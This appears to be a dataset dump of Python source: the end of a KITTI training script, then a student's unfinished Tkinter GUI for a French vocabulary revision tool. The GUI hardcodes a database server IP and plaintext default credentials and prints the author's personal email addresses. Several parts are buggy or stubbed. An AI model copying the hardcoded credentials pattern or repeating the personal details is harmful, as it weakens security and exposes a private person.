'11_f']}\n\n validation_dataset = {\n '1': ['15']}\n\n elif cfg.DATA_SETS_TYPE == 'kitti':\n training_dataset = {\n '2011_09_26': ['0001', '0017', '0029', '0052', '0070', '0002', '0018', '0056', '0019',\n '0036', '0005',\n '0057', '0084', '0020', '0039', '0086', '0011', '0023', '0046', '0060', '0091']}\n\n validation_dataset = {\n '2011_09_26': ['0013', '0027', '0048',\n '0061', '0015', '0028', '0051', '0064']\n }\n\n training = ub.batch_loading(dataset_dir, training_dataset)\n\n validation = ub.batch_loading(dataset_dir, validation_dataset)\n\n train = mv3d.Trainer(train_set=training, validation_set=validation,\n pre_trained_weights=weights, train_targets=targets, log_tag=tag,\n continue_train = args.continue_train)\n\n train(max_iter=max_iter)\n\n\n","sub_path":"experiments/archive/exp_002_round1_version_fusion_net_test_num1/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"111612882","text":"# GUI.py\n# Module containing the window classes I am using with TKinter\n# By Hugo Sebesta\n\n# External\nfrom tkinter import *\nfrom time import sleep\nimport os\n# Mine\nfrom Classes import *\nfrom Funcs import *\nfrom SQLDB import *\n\n# Global Vars\n#global 
actualRadioVariable ?\n\ndef openingDialogueScreen():\n # Default vars:\n dbIP = \"58.168.115.13\"\n dbUser = \"client\"\n dbPass = \"password\"\n db = \"frh\"\n\n openingDialogue = Tk()\n\n title = Label(openingDialogue, text=\"WELCOME\", font=(\"Helvetica\", 44))\n\n frame = LabelFrame(openingDialogue, text=\"Connection Details:\", font=(\"Helvetica\"))\n\n ipEntryText = Label(frame, text=\"Server IP\")\n dbIPStrVar = StringVar(frame, value=dbIP)\n ipEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbIPStrVar)\n\n userEntryText = Label(frame, text=\"Server User\")\n dbUserStrVar = StringVar(frame, value=dbUser)\n userEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbUserStrVar)\n\n passEntryText = Label(frame, text=\"Server Password\")\n dbPassStrVar = StringVar(frame, value=dbPass)\n passEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbPassStrVar)\n\n dbEntryText = Label(frame, text=\"Database\")\n dbStrVar = StringVar(frame, value=db)\n dbEntry = Entry(frame, font=(\"Helvetica\"), textvariable=dbStrVar)\n\n # Geometry/layout\n ipEntryText.grid(column=0, row=1)\n ipEntry.grid(column=1, row=1)\n\n userEntryText.grid(column=0, row=2)\n userEntry.grid(column=1, row=2)\n\n passEntryText.grid(column=0, row=3)\n passEntry.grid(column=1, row=3)\n\n dbEntryText.grid(column=0, row=4)\n dbEntry.grid(column=1, row=4)\n\n toReturn = []\n def openingDialogueGoButton():\n toReturn.append(ipEntry.get())\n toReturn.append(userEntry.get())\n toReturn.append(passEntry.get())\n toReturn.append(dbEntry.get())\n openingDialogue.destroy()\n\n go = Button(frame, text=\"Go!\", command=openingDialogueGoButton)\n go.grid(column=1, row=5)\n\n title.grid(column=0, row=0, columnspan=2)\n frame.grid(column=0, row=1, columnspan=3)\n\n openingDialogue.mainloop()\n return toReturn\n\ndef errorInvalidLogin():\n messagebox.showerror(\"ERROR\", \"Invalid login details!\")\n return None\n\nclass mainGUI:\n #master = Tk() This fucking line fucked me over for like two fucking months fuck me\n verbList = []\n nounList = []\n adjectiveList = []\n miscWordList = []\n ruleList = []\n\n def about(self):\n newWin = Tk()\n newWin.title(\"About\")\n title = Label(newWin, text=\"About\", font=(\"Helvetica\"))\n text = Text(newWin)\n text.insert(INSERT, \"French Revision Helper is a small tool made and managed by Hugo Sebesta.\\nIt is based on Python as it was a lot easier.\\nIt's taken a long ass time to make, so u know be a little appreciative or something.\\nAlso if you encounter any issues either email me hugo.sebesta@gmail.com, hsebesta20@student.sacs etc or talk to me in person is probably even easier.\\nThanks for using this software and feel free to let me know how I can improve it.\\nHugo\")\n title.pack()\n text.pack()\n newWin.mainloop()\n return None\n\n def help(self):\n newWin = Tk()\n newWin.title(\"Help\")\n title = Label(newWin, text=\"Help\", font=(\"Helvetica\"))\n text = Text(newWin)\n text.insert(INSERT, \"Email or speak to hugo sebesta at hugo.sebesta@gmail.com for support.\\n:)\")\n title.pack()\n text.pack()\n newWin.mainloop()\n return None\n\n def newWord(self):\n # NOTE: Forgot about comment text for all words except misc\n # if there is demand, properly implement it.\n newWin = Tk()\n # newWord2\n radioVariable = IntVar()\n def newWord2():\n newWin.destroy()\n newWin2 = Tk()\n # This doesn't get set for some reason\n print(radioVariable.get())\n if radioVariable.get() == 0: # Testing purposes\n # Info to fill\n newName = \"\"\n newDesc = \"\"\n newEx = \"\"\n # Function for button 
handler\n def nextButtonPressed():\n newName = nameEntry.get()\n newDesc = descriptionEntry.get()\n newEx = exampleEntry.get()\n self.ruleList.append(Rule(newName, newDesc, newEx))\n self.dbHandler.addRule(Rule(newName, newDesc, newEx))\n messagebox.showinfo(\"Done!\", \"Created rule \" + newName + \"!\")\n newWin2.destroy()\n return\n # Window for creating rule\n title = Label(newWin2, text=\"New Rule\", font=(\"Helvetica\", 24))\n\n nameEntryLabel = Label(newWin2, text=\"Name:\", font=(\"Helvetica\"))\n nameEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n # NOTE: Some way to enforce a character count relative to the max size of the database entry would be good to implement\n descriptionEntryLabel = Label(newWin2, text=\"Description:\", font=(\"Helvetica\"))\n descriptionScrollbar = Scrollbar(newWin2)\n descriptionEntry = Entry(newWin2, font=(\"Helvetica\"), xscrollcommand=descriptionScrollbar.set)\n descriptionScrollbar.config(command=descriptionEntry.xview)\n\n exampleEntryLabel = Label(newWin2, text=\"Example:\", font=(\"Helvetica\"))\n exampleScrollbar = Scrollbar(newWin2)\n exampleEntry = Entry(newWin2, font=(\"Helvetica\"), xscrollcommand=exampleScrollbar.set) # Scrollbar doesn't work\n exampleScrollbar.config(command=exampleEntry.xview)\n\n nextButton = Button(newWin2, command=nextButtonPressed, text=\"Next\", font=(\"Helvetica\"))\n\n # Geometry\n title.grid(row=0, column=0, columnspan=2)\n nameEntryLabel.grid(row=1, column=0)\n nameEntry.grid(row=1, column=1)\n descriptionEntryLabel.grid(row=2, column=0)\n descriptionEntry.grid(row=2, column=1, columnspan=3, rowspan=2)\n exampleEntryLabel.grid(row=4, column=0)\n exampleEntry.grid(row=4, column=1, columnspan=3, rowspan=2) # Formatting is off\n nextButton.grid(row=5, column=1, columnspan=2)\n\n newWin2.mainloop()\n elif radioVariable.get() == 1: # Testing Purposes\n # info to fill - most complex (ofc)\n newEng = \"\" # Apparently had to unpack this. Apparently doesn't work like it does in c/c++\n newFre = \"\"\n newType = \"\"\n newPP = \"\"\n newReflex = False\n newEtre = False\n newFutur = []\n newPres = []\n newImp = []\n # populate the lists with default values so we don't get issues\n for i in range(6):\n newPres.append(\"\")\n newImp.append(\"\")\n newFutur.append(\"\")\n # There's a lot\n\n # Relevant functions\n def moreButtonCallback():\n moreButtonFrame.grid(row=3, column=0, columnspan=5, rowspan=10)\n presentConjugationFrame.grid(row=0, column=0, columnspan=2, rowspan=6)\n imparfaitConjugationFrame.grid(row=0, column=2, columnspan=2, rowspan=6)\n futurConjugationFrame.grid(row=6, column=0, columnspan=5, rowspan=3)\n # use the lists with a loop to populate the remaining stuff\n for i in range(6): # could compress into one loop if desired\n presLabels[i].grid(row=i, column=0)\n presEntries[i].grid(row=i, column=1)\n for i in range(6):\n impLabels[i].grid(row=i, column=0)\n impEntries[i].grid(row=i, column=1)\n for i in range(6):\n if i % 2 == 0:\n labelCol = 1\n else:\n labelCol = 3\n futurLabels[i].grid(row=(i/2-(i%2)/2), column=labelCol)\n futurEntries[i].grid(row=(i/2-(i%2)/2), column=(labelCol+1)) # Complicated maths\n # Gotta render the less button!\n moreButton.grid_forget() # This didn't seem to work\n lessButton.grid(row=19, column=1) # See if Row is correct when testing! 
(trial and error)\n goButton.grid(row=19, column=3)\n def lessButtonCallback():\n moreButtonFrame.grid_forget()\n lessButton.grid_forget()\n goButton.grid(row=3, column=3)\n moreButton.grid(row=3, column=1)\n def nextButtonPressed():\n # Fill everything then call the database access function to add it to DB\n # This will be fun\n # Ordinary values\n newEng = englishEntry.get()\n newFre = frenchEntry.get()\n newType = typeSpinboxEntry.get() # might not work\n newPP = ppEntry.get()\n if newType == \"ER Verb\":\n actualType = ERVerb()\n elif newType == \"RE Verb\":\n actualType = REVerb()\n elif newType == \"IRVerb\":\n actualType = IRVerb()\n else:\n actualType = IrregularVerb()\n # Harder\n if reflexiveSpinboxEntry.get() == \"Yes\":\n newReflex = True\n if usesEtreSpinbox.get() == \"Yes\":\n newEtre = True\n # Those lists\n for i in range(6):\n newPres[i] = presEntries[i].get()\n newImp[i] = impEntries[i].get()\n newFutur[i] = futurEntires[i].get()\n # All done\n newVerb = Verb(newEng, newFre, actualType, newReflex)\n newVerb.pastParticiple = newPP\n newVerb.presentConjugation = newPres\n newVerb.imparfaitConjugation = newImp\n newVerb.futureSimpleConjugation = newFutur\n newVerb.usesEtreInPasseCompose = newEtre\n self.verbList.append(newVerb)\n self.dbHandler.addWord(newVerb)\n messagebox.showinfo(\"Done!\", \"Created verb \" + newFre + \"!\")\n newWin2.destroy()\n return\n\n\n # Widget setup\n title = Label(newWin2, text=\"Verb\", font=(\"Helvetica\"))\n\n # Frame\n moreButtonFrame = LabelFrame(newWin2, text=\"More\", font=(\"Helvetica\"))\n\n # Gonna have inputs outside then a button saying more which expands all the conjugations so that they don't clog up the screen if they won't be set immediately\n englishEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\"))\n englishEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n frenchEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n frenchEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n reflexiveLabel = Label(newWin2, text=\"Is Reflexive:\", font=(\"Helvetica\"))\n reflexiveSpinboxEntry = Spinbox(newWin2, values=[\"Yes\", \"No\"])\n\n typeLabel = Label(newWin2, text=\"Type:\", font=(\"Helvetica\"))\n typeSpinboxEntry = Spinbox(newWin2, values=[\"ER Verb\", \"RE Verb\", \"IR Verb\", \"Irregular\"])\n\n moreButton = Button(newWin2, text=\"More...\", font=(\"Helvetica\"), command=moreButtonCallback)\n lessButton = Button(newWin2, text=\"Less...\", font=(\"Helvetica\"), command=lessButtonCallback)\n # All the stuff that the more button activates. It just calls the grid method on the frame and then the respective members of the list\n # Frames\n presentConjugationFrame = LabelFrame(moreButtonFrame, text=\"Present Conjugation\", font=(\"Helvetica\"))\n imparfaitConjugationFrame = LabelFrame(moreButtonFrame, text=\"Imparfait Conjugation\", font=(\"Helvetica\"))\n futurConjugationFrame = LabelFrame(moreButtonFrame, text=\"Future Simple Conjugation\", font=(\"Helvetica\"))\n\n # lists comprising the conjugation table for setting up the labels and entries\n futurEntries = []\n presLabels = []\n presEntries = []\n impLabels = []\n impEntries = []\n futurLabels = []\n\n subjects = [\"je:\", \"tu:\", \"on:\", \"nous:\", \"vous:\", \"ils:\"]\n\n # Logic: have to do 3 seperate loops because of different frames. 
May as well seperate out lists too for convenience\n for i in range(6):\n presLabels.append(Label(presentConjugationFrame, text=subjects[i], font=(\"Helvetica\")))\n presEntries.append(Entry(presentConjugationFrame, font=(\"Helvetica\")))\n for i in range(6):\n impLabels.append(Label(imparfaitConjugationFrame, text=subjects[i], font=(\"Helvetica\")))\n impEntries.append(Entry(imparfaitConjugationFrame, font=(\"Helvetica\")))\n for i in range(6):\n futurLabels.append(Label(futurConjugationFrame, text=subjects[i], font=(\"Helvetica\")))\n futurEntries.append(Entry(futurConjugationFrame, font=(\"Helvetica\")))\n # That did seriously take about a 10th as long\n # Removing the original work I did (in like an hour )\n\n usesEtreLabel = Label(moreButtonFrame, text=\"Uses Etre in Passe Compose:\", font=(\"Helvetica\"))\n usesEtreSpinbox = Spinbox(moreButtonFrame, values=[\"Yes\", \"No\"])\n\n ppEntryLabel = Label(moreButtonFrame, text=\"Past Participle:\", font=(\"Helvetica\"))\n ppEntry = Entry(moreButtonFrame, font=(\"Helvetica\"))\n\n goButton = Button(newWin2, text=\"Next\", command=nextButtonPressed)\n\n # Geometry\n title.grid(row=0, column=2)\n englishEntryLabel.grid(row=1, column=0)\n englishEntry.grid(row=1, column=1)\n frenchEntryLabel.grid(row=1, column=3) # 2 per line\n frenchEntry.grid(row=1, column=4)\n reflexiveLabel.grid(row=2, column=0) # TODO finish this\n reflexiveSpinboxEntry.grid(row=2, column=1)\n typeLabel.grid(row=2, column=3)\n typeSpinboxEntry.grid(row=2, column=4)\n moreButton.grid(row=3, column=1)\n goButton.grid(row=3, column=3)\n # Note not rending all the conjugations cuz they go under \"more...\"\n elif radioVariable.get() == 2:\n # this is becoming rather aids\n\n # Start with all the widgets (ah duh)\n # Not too many fields to fill luckily\n newEng = \"\"\n newFre = \"\"\n newPlural = \"\"\n newGen = \"\"\n\n # callback function\n def GoButtonCallback():\n newEng = engEntry.get()\n newFre = freEntry.get()\n newPlural = pluralEntry.get()\n newGen = genderEntry.get()\n if newGen == \"Masculine\":\n gender = Masculine()\n else:\n gender = Feminine()\n self.nounList.append(Noun(newEng, newFre, newPlural, gender))\n self.dbHandler.addWord(Noun(newEng, newFre, newPlural, gender))\n newWin2.quit()\n messagebox.showinfo(\"Done!\", \"Added noun \" + newFre + \"!\")\n return\n # Wdigets\n title = Label(newWin2, text=\"Noun\", font=(\"Helvetica\"))\n\n engEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\"))\n engEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n freEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n freEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n pluralEntryLabel = Label(newWin2, text=\"Plural Ending:\", font=(\"Helvetica\"))\n pluralEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n genderEntryLabel = Label(newWin2, text=\"Gender:\", font=(\"Helvetica\"))\n pluralEntry = Spinbox(newWin2, values=[\"Masculine\", \"Feminine\"])\n\n goButton = Button(newWin2, text=\"Next\", command=GoButtonCallback)\n\n # Geometry\n title.grid(row=0, column=0, columnspan=2)\n engEntryLabel.grid(row=1, column=0)\n engEntry.grid(row=1, column=1)\n freEntryLabel.grid(row=2, column=0)\n freEntry.grid(row=2, column=1)\n pluralEntryLabel.grid(row=3, column=0)\n pluralEntry.grid(row=3, column=1)\n genderEntryLabel.grid(row=4, column=0)\n genderEntry.grid(row=4, column=1)\n goButton.grid(row=5, column=0, columnspan=2)\n\n elif radioVariable.get() == 3:\n # Usual shit\n newEng = \"\"\n newFre = \"\"\n newPluralEnd = \"\"\n newFemEnd = \"\"\n\n # button 
callback\n def goButtonCallback():\n newEng = engEntry.get()\n newFre = freEntry.get()\n newPluralEnd = pluralEntry.get()\n newFemEnd = femEntry.get()\n self.adjectiveList.append(Adjective(newEng, newFre, newPluralEnd, newFemEnd))\n self.dbHandler.addWord(Adjective(newEng, newFre, newPluralEnd, newFemEnd))\n messagebox.showinfo(\"Done!\", \"Added adjective \" + newFre + \"!\")\n newWin2.quit()\n return\n # Widgets\n title = Label(newWin2, text=\"Adjective\", font=(\"Helvetica\"))\n\n engEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\"))\n engEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n freEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n freEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n pluralEntryLabel = Label(newWin2, text=\"Plural Ending:\", font=(\"Helvetica\"))\n pluralEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n femEntryLabel = Label(newWin2, text=\"Feminine Ending:\", font=(\"Helvetica\"))\n femEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n goButton = Button(newWin2, text=\"Next\", command=goButtonCallback)\n\n # Geometry\n title.grid(row=0, column=0, columnspan=2)\n engEntryLabel.grid(row=1, column=0)\n engEntry.grid(row=1, column=1)\n freEntryLabel.grid(row=2, column=0)\n freEntry.grid(row=2, column=1)\n pluralEntryLabel.grid(row=3, column=0)\n pluralEntry.grid(row=3, column=1)\n femEntryLabel.grid(row=4, column=0)\n femEntry.grid(row=4, column=1)\n goButton.grid(row=5, column=0, columnspan=2)\n else:\n # misc\n newEng = \"\"\n newFre = \"\"\n newCom = \"\"\n\n # Callback\n def goButtonCallback():\n newEng = engEntry.get()\n newFre = freEntry.get()\n newCom = comEntry.get()\n\n newMisc = Misc(newEng, newFre)\n newMisc.commentText = newCom\n\n self.miscWordList.append(newMisc)\n # Code to add to db\n messagebox.showinfo(\"Done!\", \"Added misc word \" + newFre + \"!\")\n newWin2.quit()\n return\n # Widgets\n title = Label(newWin2, text=\"Miscelaneous Word\", font=(\"Helvetica\"))\n\n engEntryLabel = Label(newWin2, text=\"English:\", font=(\"Helvetica\")) # This code could probably be declared before the if statement but o well\n engEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n freEntryLabel = Label(newWin2, text=\"French:\", font=(\"Helvetica\"))\n freEntry = Entry(newWin2, font=(\"Helvetica\"))\n\n comScrollbar = Scrollbar(newWin2)\n comEntryLabel = Label(newWin2, text=\"Comment:\", font=(\"Helvetica\"))\n comEntry = Entry(newWin2, font=(\"Helvetica\"), xscrollcommand=comScrollbar.get)\n comScrollbar.config(command=comEntry.xview)\n\n goButton = Button(newWin2, text=\"Next\", command=goButtonCallback)\n\n newWin2.mainloop()\n\n # Widgets\n title = Label(newWin, text=\"Select type to add.\", font=(\"Helvetica\", 24))\n r1 = Radiobutton(newWin, text=\"Rule\", variable=radioVariable, value=0)\n r2 = Radiobutton(newWin, text=\"Verb\", variable=radioVariable, value=1)\n r3 = Radiobutton(newWin, text=\"Noun\", variable=radioVariable, value=2)\n r4 = Radiobutton(newWin, text=\"Adjective\", variable=radioVariable, value=3)\n r5 = Radiobutton(newWin, text=\"Other word\", variable=radioVariable, value=4)\n next = Button(newWin, text=\"Next\", command=newWord2)\n\n r2.select()\n\n # Layout\n title.grid(row=0, column=0,columnspan=3)\n r1.grid(row=1, column=0, columnspan=3)\n r2.grid(row=2, column=0, columnspan=3)\n r3.grid(row=3, column=0, columnspan=3)\n r4.grid(row=4, column=0, columnspan=3)\n r5.grid(row=5, column=0, columnspan=3)\n next.grid(row=6, column=1)\n\n # done\n newWin.mainloop()\n\n def dbExport(self):\n \"Exports the local 
database to a file provided\" # if someone can suggest a useful format for this then be my guest otherwise we're just getting the weird shit express and that's ok\n # GUI setup\n win = Tk()\n win.title(\"Export\")\n # Required functions\n def export():\n fileAddr = entry.get()\n f = open(fileAddr, 'w', 0)\n f.write(\"French Revision Helper Export by Hugo Sebesta\\n\")\n f.write(\"Verbs:\\n\")\n for word in self.verbList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.verbType.__class__.__name__ + \"\\n\")\n if word.isReflexive:\n f.write(\"Is reflexive\\n\")\n else:\n f.write(\"Isn't reflexive\\n\")\n f.write(word.pastParticiple + \"\\n\")\n f.write(\"Present Conjugation: \")\n for i in range(6):\n f.write(word.presentConjugation[i] + \",\")\n f.write(\"\\nImparfait Conjugation: \")\n for i in range(6):\n f.write(word.imparfaitConjugation[i] + \",\")\n f.write(\"\\nFuture Simple Conjugation: \")\n for i in range(6):\n f.write(word.futureSimpleConjugation[i] + \",\")\n if word.usesEtreInPasseCompose:\n f.write(\"\\nUses Etre in Passe Compose\")\n else:\n f.write(\"\\nDoesn't use Etre in Passe Compose\")\n f.write(\"\\n --- \\n\")\n f.write(\"Nouns:\\n\")\n for word in self.nounList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.plural + \",\" + word.gender.__class__.__name__ + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"Adjectives:\\n\")\n for word in self.adjectiveList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.plural + \",\" + word.feminine + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"Misc:\\n\")\n for word in self.miscWordList:\n f.write(word.englishDef + \",\" + word.frenchDef + \"\\n\")\n f.write(word.commentText + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"Rules:\\n\")\n for rule in self.ruleList:\n f.write(rule.name + \"\\n\")\n f.write(rule.description + '\\n')\n f.write(rule.example + \"\\n\")\n f.write(\"\\n --- \\n\")\n f.write(\"End - FRH, Hugo Sebesta\")\n f.close()\n win.quit()\n return None\n # Widgets\n title = Label(win, text=\"Enter an address to place the file:\", font=(\"Helvetica\"))\n entry = Entry(win, font=(\"Helvetica\"))\n button = Button(win, text=\"Export\", command=export)\n\n win.mainloop()\n\n def __init__(self, root, verbs, nouns, adjectives, miscs, rules, db):\n # Database Handling Class\n self.dbHandler = db\n # Initial variable setting\n self.master = root\n self.verbList = verbs\n self.nounList = nouns\n self.adjectiveList = adjectives\n self.miscWordList = miscs\n self.ruleList = rules\n\n # Adjustments to main Tk class\n self.master.title(\"French Revision Helper\")\n\n # Rendering the main menu\n # Make all the widgets\n\n # Menubar\n # Commands\n def menuFileOpen():\n os.execl(\"FRH.py\", \"1\") # this doesnt work :)\n def menuFileExport():\n self.dbExport()\n def menuFileClose():\n # yea idk what this one wouuld do either\n pass\n\n def menuEditNew():\n self.newWord()\n def menuEditUndo():\n pass # Gonna be realllly hard to implement Not gonna implement (yet)\n def menuEditCut():\n pass # Again another oof Not gonna implement (yet)\n def menuEditCopy():\n pass # Not gonna implement (yet)\n def menuEditPaste():\n pass # Not gonna implement (yet)\n def menuEditDelete():\n pass # Not gonna implement (yet)\n\n def menuHelpAbout():\n self.about()\n def menuHelpHelp():\n self.help()\n # Widgets\n menubar = Menu(self.master)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Open\", command=menuFileOpen)\n 
filemenu.add_command(label=\"Export\", command=menuFileExport)\n filemenu.add_command(label=\"Close\", command=menuFileClose)\n filemenu.add_separator()\n filemenu.add_command(labe=\"Exit\", command=self.master.quit) # This might be wrong\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n editmenu = Menu(menubar, tearoff=0)\n editmenu.add_command(label=\"New...\", command=menuEditNew)\n #editmenu.add_command(label=\"Undo\", command=menuEditUndo) # Honestly just gonna be so hard\n #editmenu.add_command(label=\"Cut\", command=menuEditCut)\n #editmenu.add_command(label=\"Copy\", command=menuEditCopy)\n #editmenu.add_command(label=\"Paste\", command=menuEditPaste)\n #editmenu.add_command(label=\"Delete\", command=menuEditDelete)\n menubar.add_cascade(label=\"Edit\", menu=editmenu)\n\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=menuHelpAbout)\n helpmenu.add_command(label=\"Help\", command=menuHelpHelp)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n # Done, make modifications to the root window\n self.master.config(menu=menubar)\n\n # Main GUI Widgets\n # Design: Frame on left containing list of words/rules (switch between through radiobox at top)\n # Frame on right containing all details of words/rules\n # Buttons underneath right frame containing operations\n\n # Begin with relevant frames\n # JOKES to be scrollable everything needs to be on a canvas\n # This is getting complicated...\n leftFrame = Frame(self.master)\n leftListFrameCanvas = Canvas(leftFrame)\n leftListFrame = Frame(leftListFrameCanvas)\n rightFrame = Frame(self.master)\n rightCanvas = Canvas(rightFrame)\n rightDataFrame = Frame(rightCanvas)\n\n # Scrollbar setup\n leftListScrollbar = Scrollbar(leftListFrame, orient=\"vertical\", command=leftListFrameCanvas.yview)\n leftListFrameCanvas.configure(yscrollcommand=leftListScrollbar.set)\n\n rightScrollbar = Scrollbar(rightDataFrame, orient=\"vertical\", command=rightCanvas.yview)\n rightCanvas.configure(yscrollcommand=rightScrollbar.set)\n # Word and Rule lists of widgets to render\n # Single list containing the words then a break then the next set then a break\n # Rule list follows same format\n wordWidgetList = [] # All containing labels, some will be bound to event handlers\n ruleWidgetList = [] # All containing labels, rules bound to handlers etc\n\n # Functions\n def displayWordLists():\n i = 0\n for word in wordWidgetList:\n word.grid(row=i, column=0, columnspan=4) # might be wrong\n i = i + 1\n def displayRuleLists():\n i = 0\n for rule in ruleWidgetList:\n rule.grid(row=i, column=0, columnspan=4)\n i = i + 1\n def searchBarGo():\n pass\n\n def listItemClickedCallback(event):\n widget = event.widget\n # get object corresponding to item clicked (word/rule)\n i = 0\n verbDone = False # Just making sure we don't get into an infinite loop here\n adjDone = False\n nounDone = False\n miscDone = False\n ruleDone = False\n while 1:\n try:\n if self.verbList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.verbList[i]\n break\n except Exception:\n verbDone = True\n try:\n if self.adjectiveList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.adjectiveList[i]\n break\n except Exception:\n adjDone = True\n try:\n if self.nounList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.nounList[i]\n break\n except Exception:\n nounDone = True\n try:\n if 
self.miscWordList[i].englishDef == widget.cget(\"text\")[:widget.cget(\"text\").find(\",\")]:\n objectToDisplay = self.miscWordList[i]\n break\n except Exception:\n miscDone = True\n try:\n if self.ruleList[i].name == widget.cget(\"text\"):\n objectToDisplay = self.ruleList[i]\n break\n except Exception:\n ruleDone = True\n if verbDone and adjDone and nounDone and miscDone and ruleDone:\n print(\"Error in algorithm determining object in widget\")\n return\n i = i + 1\n\n objectToDisplay = o # just to make my life easier\n # TODO:\n # Create all widgets using the frame as the parent (or the canvas once I figure out which I need to do)\n # Grid them all properly\n # Regrid the buttons - maybe change them so that they're outside the frames so you don't have to scroll to the bottom to click them\n # Enable the relevant buttons\n # Make sure to bind a command for entering text into the entires so that we can swap out the add button for revert or whatever I decided it should be\n # Do it\n if o.__class__.__name__ == \"Verb\":\n pass\n elif o.__class__.__name__ == \"Noun\":\n pass\n elif o.__class__.__name__ == \"Adjective\":\n pass\n elif o.__class__.__name__ == \"Misc\":\n pass\n if o.__class__.__name__ == \"Rule\":\n # Thank the lord cuz my life's easy peasy\n pass\n\n\n def addNewButtonCallback():\n pass\n def revertButtonCallback():\n pass\n def deleteButtonCallback():\n pass\n def saveButtonCallback():\n pass\n\n # Top layer i.e. outside a frame\n title = Label(self.master, text=\"French Revision Helper\", font=(\"Helvetica\", 24))\n\n # Right frame buttons\n addNewButton = Button(rightFrame, text=\"Add\", command=addNewButtonCallback)\n revertButton = Button(rightFrame, text=\"Revert\", command=revertButtonCallback)\n deleteButton = Button(rightFrame, text=\"Delete\", command=deleteButtonCallback, state=DISABLED)\n saveButton = Button(rightFrame, text=\"Save\", command=saveButtonCallback, state=DISABLED)\n\n # Now left frame\n wordRadioButton = Radiobutton(leftFrame, text=\"Words\", command=displayWordLists) # Placed side by side at top\n ruleRadioButton = Radiobutton(leftFrame, text=\"Rules\", command=displayRuleLists)\n\n # Any search bar would go here once constructed (may as well make the entry for it)\n searchBarLabel = Label(leftFrame, text=\"Search:\", font=(\"Helvetica\"))\n searchBarButton = Button(leftFrame, text=\"Go\", command=searchBarGo, state=DISABLED)\n def searchBarEdit():\n searchBarButton.config(state=\"normal\")\n searchBarEntry = Entry(leftFrame, font=(\"Helvetica\"))\n searchBarEntry.bind(\"\", searchBarButton.configure(state=NORMAL))\n\n # Going to have a widget list that will be scrollable\n # Scrollbar declared earlier to make my life easier\n\n wordWidgetList.append(Label(leftListFrame, text=\"Verbs\", font=(\"Helvetica\")))\n for verb in self.verbList:\n newVerbLabel = Label(leftListFrame, text=verb.englishDef + \", \" + verb.frenchDef, font=(\"Helvetica\"))\n newVerbLabel.bind(\"\", listItemClickedCallback)\n wordWidgetList.append(newVerbLabel)\n\n wordWidgetList.append(Label(leftListFrame, text=\"Nouns\", font=(\"Helvetica\")))\n for noun in self.nounList:\n newNounLabel = Label(leftListFrame, text=noun.englishDef + \", \" + noun.frenchDef, font=(\"Helvetica\"))\n newNounLabel.bind(\"\", listItemClickedCallback)\n wordWidgetList.append(newNounLabel)\n\n wordWidgetList.append(Label(leftListFrame, text='Adjectives', font=(\"Helvetica\")))\n for adj in self.adjectiveList:\n newAdjLabel = Label(leftListFrame, text=adj.englishDef + \", \" + adj.frenchDef, 
font=(\"Helvetica\"))\n newAdjLabel.bind('', listItemClickedCallback)\n wordWidgetList.append(newAdjLabel)\n\n wordWidgetList.append(Label(leftListFrame, text=\"Misc\", font=(\"Helvetica\")))\n for misc in self.miscWordList:\n newMiscLabel = Label(leftListFrame, text=misc.englishDef + \", \" + misc.frenchDef, font=(\"Helvetica\"))\n newMiscLabel.bind(\"\", listItemClickedCallback)\n wordWidgetList.append(newMiscLabel)\n\n # Populate the rule widget list\n for rule in self.ruleList:\n newRuleLabel = Label(leftListFrame, text=rule.name, font=(\"Helvetica\"))\n newRuleLabel.bind(\"\", listItemClickedCallback)\n ruleWidgetList.append(newRuleLabel)\n\n # Set geometry for static parts of the layout\n title.grid(row=0, column=1, columnspan=4)\n\n leftFrame.grid(row=2, column=0, rowspan=14, columnspan=8)\n rightFrame.grid(row=2, column=8, rowspan=14, columnspan=15)\n\n # Canvases\n rightCanvas.grid(row=0, column=0, rowspan=13, columnspan=14)\n leftListFrameCanvas.grid(row=0, column=0, rowspan=12, columnspan=7)\n\n wordRadioButton.grid(row=0, column=0)\n ruleRadioButton.grid(row=0, column=3)\n\n searchBarLabel.grid(row=1, column=0)\n searchBarEntry.grid(row=1, column=1, columnspan=4)\n searchBarButton.grid(row=1, column=5)\n\n leftListFrame.pack()\n rightDataFrame.pack()\n\n saveButton.grid(row=13, column=0, columnspan=5)\n deleteButton.grid(row=13, column=5, columnspan=5) # Check these numbers\n addNewButton.grid(row=13, column=10, 